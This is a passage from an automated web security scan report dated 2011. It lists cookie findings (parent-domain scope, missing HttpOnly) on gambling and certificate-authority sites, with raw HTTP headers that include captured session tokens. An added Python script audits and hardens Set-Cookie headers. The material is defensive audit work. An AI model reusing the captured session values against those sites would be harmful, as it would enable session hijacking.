A cookie issued by the application (see the Set-Cookie headers in the response below) is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Terms.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 99951


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.236. http://www.svenskalotter.com/UnderAge.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /UnderAge.aspx

Issue detail

A cookie issued by the application (see the Set-Cookie headers in the response below) is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:04 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:04 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:04 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:04 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:04 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34803


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.237. http://www.svenskalotter.com/click/Svenskalotter.com/SWE/Home/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /click/Svenskalotter.com/SWE/Home/

Issue detail

A cookie issued by the application (see the Set-Cookie headers in the response below) is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/Svenskalotter.com/SWE/Home/ HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:23 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:23 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:23 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:23 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:23 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34601


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.238. http://www.thawte.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thawte.com
Path:   /

Issue detail

Cookies issued by the application (see the Set-Cookie headers in the response below) are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.thawte.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:24:06 GMT
Server: Apache
Set-Cookie: v1st=6CA51F7C72FB1FFE; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.thawte.com
Set-Cookie: v1st=6CA51F7C72FB1FFE; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.thawte.com
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 39346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...

11.239. https://www.thawte.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.thawte.com
Path:   /

Issue detail

Cookies issued by the application (see the Set-Cookie headers in the response below) are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.thawte.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:58:53 GMT
Server: Apache
Set-Cookie: v1st=5154A4B37CB7DE69; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.thawte.com
Set-Cookie: v1st=5154A4B37CB7DE69; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.thawte.com
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 39378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...

11.240. http://www.verisign.co.uk/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.co.uk
Path:   /

Issue detail

Cookies issued by the application (see the Set-Cookie headers in the response below) are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.verisign.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:35:15 GMT
Server: Apache
Set-Cookie: v1st=3D2EA54A28A1F00A; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.co.uk
Set-Cookie: v1st=3D2EA54A28A1F00A; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.co.uk
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 29123

<!DOCTYPE html>
<html lang="">
   <head>
       <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea
...[SNIP]...

11.241. http://www.youtube.com/user/CrazyScratchCom

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /user/CrazyScratchCom

Issue detail

Cookies issued by the application (see the Set-Cookie headers in the response below) are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /user/CrazyScratchCom HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:58:44 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=QJdmZX3XHX0; path=/; domain=.youtube.com; expires=Wed, 11-Jan-2012 11:58:44 GMT
Set-Cookie: GEO=dfb55d2f94c5feeb036cbf6d295ddc27cwsAAAAzVVOtwdbzTdERdA==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" xmlns:og="http://opengraphprotocol.org/schema/">
<!-- machid: sWkFSZzctYUFHdmpGMkpmS0VXa1VnRXBhekJpVlNscGE1Qk9SUzZoUG5wc3hvU3dmRHVtcUt3 -->
<head>



...[SNIP]...

11.242. http://www.youtube.com/user/PostcodeLottery

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /user/PostcodeLottery

Issue detail

Cookies issued by the application (see the Set-Cookie headers in the response below) are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /user/PostcodeLottery HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:58:44 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=QPD6waz_a-Y; path=/; domain=.youtube.com; expires=Wed, 11-Jan-2012 11:58:44 GMT
Set-Cookie: GEO=dfb55d2f94c5feeb036cbf6d295ddc27cwsAAAAzVVOtwdbzTdERdA==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" xmlns:og="http://opengraphprotocol.org/schema/">
<!-- machid: sd1dXU2oteFNMSkZHd0ZhX1FzYkZzMDNQRDJkMTVDSU9HTmxZTk9ITmZXNkRwNGt2blpXSDdB -->
<head>



...[SNIP]...

11.243. http://www.youtube.com/user/primescratchcards1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /user/primescratchcards1

Issue detail

Cookies issued by the application (see the Set-Cookie headers in the response below) are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /user/primescratchcards1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:58:46 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=o7D5C2X2FIw; path=/; domain=.youtube.com; expires=Wed, 11-Jan-2012 11:58:46 GMT
Set-Cookie: GEO=8d3458027bf69c9d59b40211c24404e3cwsAAAAzVVOtwdbzTdERdg==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" xmlns:og="http://opengraphprotocol.org/schema/">
<!-- machid: sWkFSZzctYUFHdmh6U2NNLTZ0UURUcHA1MXdfYjVEQnNxaTVWdFFmSDE4WmcwTG5va3VETmVn -->
<head>



...[SNIP]...

11.244. http://www.youtube.com/v/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /v/

Issue detail

A cookie issued by the application (see the Set-Cookie header in the response below) is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v/ HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 11:58:46 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: VISITOR_INFO1_LIVE=VtM0_rUoIeg; path=/; domain=.youtube.com; expires=Wed, 11-Jan-2012 11:58:46 GMT
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html; charset=utf-8
Connection: close


12. Cookie without HttpOnly flag set
There are 380 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
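The following Python script is an added example for this report and is not part of the original scan output or any of the scanned sites' code. It parses raw Set-Cookie header values the way the findings in sections 11 and 12 are judged: it flags a cookie whose Domain attribute names a parent of the issuing host, flags a cookie issued without HttpOnly, and applies a name-based heuristic (matching names such as PHPSESSID, ASP.NET_SessionId or WinningsSID) in place of the scanner's "appears to contain a session token" judgement. It also shows the remediation from the text, adding HttpOnly to a header that lacks it. Function names, the host `casino.example.com` and the sample header values are this example's own, constructed to mirror the shape of the responses above.

```python
"""Audit Set-Cookie headers for the two cookie findings in this report:
cookies scoped to a parent of the issuing host (section 11) and cookies
issued without the HttpOnly flag (section 12).

Added example; not part of the scan report or any scanned site's code.
Hostnames and cookie values below are constructed for the example.
"""
import re
from typing import Dict, List, Optional, Union

Attrs = Dict[str, Union[str, bool]]


def parse_set_cookie(header_value: str) -> Dict[str, object]:
    """Split one Set-Cookie value into its name, value and attributes.

    Attribute names are case-insensitive (RFC 6265), so they are lowercased.
    Valueless flags such as HttpOnly and Secure are stored as True.
    """
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs: Attrs = {}
    for attr in parts[1:]:
        if not attr:
            continue
        key, _, val = attr.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return {"name": name.strip(), "value": value.strip(), "attrs": attrs}


def is_parent_scoped(cookie_domain: Optional[Union[str, bool]], issuing_host: str) -> bool:
    """True when the Domain attribute names a proper parent of the issuing host.

    www.svenskalotter.com issuing `domain=svenskalotter.com` is parent-scoped:
    every other host under svenskalotter.com receives the cookie. No Domain
    attribute, or one equal to the host, means host-only scope.
    """
    if not isinstance(cookie_domain, str) or not cookie_domain:
        return False
    domain = cookie_domain.lower().lstrip(".")
    host = issuing_host.lower()
    return domain != host and host.endswith("." + domain)


def looks_like_session_cookie(name: str) -> bool:
    """Name-based heuristic standing in for the scanner's session-token guess:
    matches ASP.NET_SessionId, PHPSESSID, ASPSESSIONID*, WinningsSID and
    'session', but not lng, CountryCode or UniqueVisitorID."""
    return re.search(r"sess|sid$", name, re.IGNORECASE) is not None


def audit_set_cookie(header_value: str, issuing_host: str) -> List[str]:
    """Return the finding labels that apply to one Set-Cookie header."""
    attrs = parse_set_cookie(header_value)["attrs"]
    findings = []
    if "httponly" not in attrs:
        findings.append("missing-httponly")
    if is_parent_scoped(attrs.get("domain"), issuing_host):
        findings.append("parent-domain")
    return findings


def audit_response(set_cookie_headers: List[str], issuing_host: str) -> List[Dict[str, object]]:
    """Audit every Set-Cookie header of one response. Only cookies with findings
    are reported; likely session cookies are marked so they can be triaged
    first, as the report does ('may increase the risk')."""
    report = []
    for header_value in set_cookie_headers:
        findings = audit_set_cookie(header_value, issuing_host)
        if not findings:
            continue
        name = parse_set_cookie(header_value)["name"]
        report.append({"name": name, "findings": findings,
                       "likely_session": looks_like_session_cookie(name)})
    return report


def harden_set_cookie(header_value: str) -> str:
    """Remediation from the report: append HttpOnly to a Set-Cookie that lacks
    it. Other attributes are untouched and the operation is idempotent."""
    if "httponly" in parse_set_cookie(header_value)["attrs"]:
        return header_value
    return header_value.rstrip("; ") + "; HttpOnly"


# Constructed sample modelled on the shape of the bet365 and thawte responses
# in this report (host and values are invented for the example).
SAMPLE_HOST = "casino.example.com"
SAMPLE_SET_COOKIES = [
    "ASP.NET_SessionId=k7qv2dn0bt0d5yaxszslwnrz; path=/; HttpOnly",
    "stk=0123456789ABCDEF0123456789ABCDEF000002; path=/",
    "session=stk=0123456789ABCDEF0123456789ABCDEF000002; path=/",
    "lng=en-GB; expires=Tue, 15-May-2012 12:32:26 GMT; path=/",
    "v1st=6CA51F7C72FB1FFE; path=/; domain=.example.com",
]

if __name__ == "__main__":
    for entry in audit_response(SAMPLE_SET_COOKIES, SAMPLE_HOST):
        print(entry)
    print(harden_set_cookie(SAMPLE_SET_COOKIES[1]))
```

Two points the instances below illustrate. First, framework-level switches only cover the framework's own cookie: in the bet365 responses ASP.NET_SessionId already carries HttpOnly (the `<httpCookies httpOnlyCookies="true" />` setting under `<system.web>` in web.config does that for ASP.NET 2.0 and later, and `session.cookie_httponly = 1` in php.ini does the same for PHPSESSID), while the application-issued `stk` and `session` cookies do not, so the flag has to be added wherever application code itself issues a cookie. Second, the parent-domain check is about exposure rather than a defect in itself: a cookie set for `.winnings.com` is sent to every host under that domain, so the risk depends on whether any of those hosts is less trusted than the one that issued it.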



12.1. http://bingo.bet365.com/play/en/home/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://bingo.bet365.com
Path:   /play/en/home/

Issue detail

Cookies issued by the application (see the Set-Cookie headers in the response below) do not have the HttpOnly flag set. One of these cookies appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /play/en/home/ HTTP/1.1
Host: bingo.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:35:26 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=uhx0t5ntbzbisd55vri2jy55; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=FE57C4F4DDFF44EDB9007B44EEA8BA12000002; path=/
Set-Cookie: session=stk=FE57C4F4DDFF44EDB9007B44EEA8BA12000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:35:26 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:35:26 GMT; path=/
Set-Cookie: LandingVisited=True; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:35:26 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 130943


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Bingo at bet36
...[SNIP]...

12.2. http://blog.primescratchcards.co.uk/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://blog.primescratchcards.co.uk
Path:   /

Issue detail

A cookie issued by the application (see the Set-Cookie header in the response below) does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: blog.primescratchcards.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:35:54 GMT
Server: Apache
Pragma: no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
X-Pingback: http://blog.primescratchcards.co.uk/xmlrpc.php
Set-Cookie: PHPSESSID=dkgc1a7hrji5t2svft9c8fovq2; path=/
Last-Modified: Mon, 16 May 2011 12:35:54 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

12.3. http://br.winnings.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://br.winnings.com
Path:   /

Issue detail

Cookies issued by the application (see the Set-Cookie headers in the response below) do not have the HttpOnly flag set. One of these cookies appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: br.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=b8ce8h87e1pqll04kbcnv4sh36; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[subdomain]=br; expires=Wed, 15-Jun-2011 12:45:26 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:45:26 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[lang]=br; expires=Wed, 15-Jun-2011 12:45:26 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[sessionId]=103123651; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=541024; expires=Tue, 15-May-2012 12:45:27 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:45:29 GMT
Connection: close
Content-Length: 23207

<!DOCTYPE html>
<html dir="ltr" lang="pt-BR">
<head>
<meta charset="UTF-8" />

<title>Winnings.com - O melhor lugar para jogos de dinheiro online!..| Winnings.com</title>
<link rel="alternate"
...[SNIP]...

12.4. http://casino.bet365.com/en/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://casino.bet365.com
Path:   /en/

Issue detail

Cookies issued by the application (see the Set-Cookie headers in the response below) do not have the HttpOnly flag set. One of these cookies appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/ HTTP/1.1
Host: casino.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:26 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=kquhbqy0bt0d5yaxszslwnrz; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=F78693A44C0F441AB8C1C7A10CF8575A000002; path=/
Set-Cookie: session=stk=F78693A44C0F441AB8C1C7A10CF8575A000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:32:26 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:32:26 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:32:26 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 90165


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><t
...[SNIP]...

12.5. http://casino.bet365.com/extra/en/online-games/baccarat

Summary

Severity:   Low
Confidence:   Firm
Host:   http://casino.bet365.com
Path:   /extra/en/online-games/baccarat

Issue detail

Cookies issued by the application (see the Set-Cookie headers in the response below) do not have the HttpOnly flag set. One of these cookies appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /extra/en/online-games/baccarat HTTP/1.1
Host: casino.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:25 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=cbmjzc45ptk3gqmomxrqk1mx; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=738A9FB42BA343DABCD3136AA3621ACE000002; path=/
Set-Cookie: session=stk=738A9FB42BA343DABCD3136AA3621ACE000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:32:25 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:32:25 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:32:25 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 88186


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_Html" xmlns="http://www.w3.org/1999/xhtml">
<head id="
...[SNIP]...

12.6. http://casino.bet365.com/extra/en/online-games/blackjack

Summary

Severity:   Low
Confidence:   Firm
Host:   http://casino.bet365.com
Path:   /extra/en/online-games/blackjack

Issue detail

Cookies issued by the application (see the Set-Cookie headers in the response below) do not have the HttpOnly flag set. One of these cookies appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /extra/en/online-games/blackjack HTTP/1.1
Host: casino.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:24 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=oltt0c55lt0sebb3qyxf2u45; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=A71662CB8A884A4A9D4A3B4BA20AEE87000002; path=/
Set-Cookie: session=stk=A71662CB8A884A4A9D4A3B4BA20AEE87000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:32:23 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:32:23 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:32:24 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 86154


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_Html" xmlns="http://www.w3.org/1999/xhtml">
